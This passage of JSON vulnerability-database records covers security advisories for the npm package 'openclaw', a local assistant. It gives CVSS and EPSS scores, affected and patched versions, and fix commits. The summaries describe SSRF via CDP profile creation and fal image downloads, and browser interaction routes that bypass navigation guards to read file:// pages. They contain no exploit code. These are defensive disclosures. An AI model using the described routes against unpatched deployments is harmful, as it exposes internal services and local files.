bility":"VCID-w58d-6veg-uugy"},{
"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41336","GHSA-3qpv-xf3v-mm45"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vx5d-3d98-7kf3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89488?format=json","vulnerability_id":"VCID-vy8v-np82-r3b5","summary":"OpenClaw: resolvedAuth closure becomes stale after config reload\n## Impact\n\nresolvedAuth closure becomes stale after config reload.\n\nAfter a config reload, newly accepted gateway connections could continue using stale resolved auth state.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41916","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2519","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25127","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25176","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41916"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T1
9:00:46Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41916","reference_id":"CVE-2026-41916","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41916"},{"reference_url":"https://github.com/advisories/GHSA-68x5-xx89-w9mm","reference_id":"GHSA-68x5-xx89-w9mm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68x5-xx89-w9mm"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload","reference_id":"openclaw-stale-authentication-state-via-config-reload","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:00:46Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-f
yhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41916","GHSA-68x5-xx89-w9mm"],"risk_score":3.1,"exploitability":"0.5","weighted_sever
ity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vy8v-np82-r3b5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89518?format=json","vulnerability_id":"VCID-vz7k-r7c4-ebfg","summary":"OpenClaw: Browser CDP profile creation skipped strict-mode SSRF checks\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBrowser profile creation normalized `cdpUrl` values before persisting them, but did not apply the configured browser SSRF policy at creation time. In deployments that explicitly disabled private-network CDP targets, a stored profile could still point at a private-network or metadata endpoint and later be probed by normal profile status flows.\n\nDefault trusted-operator browser behavior allows private-network CDP endpoints, so this only affected strict-mode deployments. Severity is low.\n\n## Fix\n\nOpenClaw now checks CDP endpoints against the browser SSRF policy during profile creation and reachability operations.\n\nFix commits:\n\n- `1fd049e3074cac72f6734a7fe88468c84f5f8bd7`\n- `e90c89cf8b1459f2aa1f3a665be67392b6c03fdf`\n\n## Release\n\nFixed in OpenClaw 
`2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm"},{"reference_url":"https://github.com/advisories/GHSA-j4c5-89f5-f3pm","reference_id":"GHSA-j4c5-89f5-f3pm","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github
.com/advisories/GHSA-j4c5-89f5-f3pm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-j4c5-89f5-f3pm"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vz7k-r7c4-ebfg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89125?format=json","vulnerability_id":"VCID-w2rd-2j4p-gfgw","summary":"OpenClaw affected by SSRF via unguarded image download in fal provider\n## Summary\n\nThe fal provider used raw fetches for both provider API traffic and returned image download URLs instead of the existing SSRF-guarded fetch path.\n\n## Impact\n\nA malicious or compromised fal relay could make the gateway fetch internal URLs and expose metadata or internal service responses through the image pipeline.\n\n## Affected Component\n\n`extensions/fal/image-generation-provider.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `80d1e8a11a` (`fal: guard image fetches`).\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34504","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17232","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17236","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17891","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34504"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textu
al","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring
_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider"},{"reference_url":"https://github.com/advisories/GHSA-qxgf-hmcj-3xw3","reference_id":"GHSA-qxgf-hmcj-3xw3","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qxgf-hmcj-3xw3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6
fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9
ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a
7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-34504","GHSA-qxgf-hmcj-3xw3"],"risk_score":3.8,"exploitability":"0.5","weighted_severity":"7.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w2rd-2j4p-gfgw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89348?format=json","vulnerability_id":"VCID-w2tj-nqa6-cuam","summary":"OpenClaw: Browser interaction routes could pivot into local CDP and regain file reads\n## Summary\n\nBrowser interaction routes could pivot into local CDP and regain file reads.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nBrowser act/evaluate interactions could trigger navigation into the local CDP origin and then create or read disallowed `file://` pages despite direct navigation guards.\n\n## Technical Details\n\nThe fix re-checks browser URLs after interaction-driven navigations and blocks targets that violate the configured navigation policy.\n\n## Fix\n\nThe issue was fixed in #63226. 
The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- PR: #63226\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this 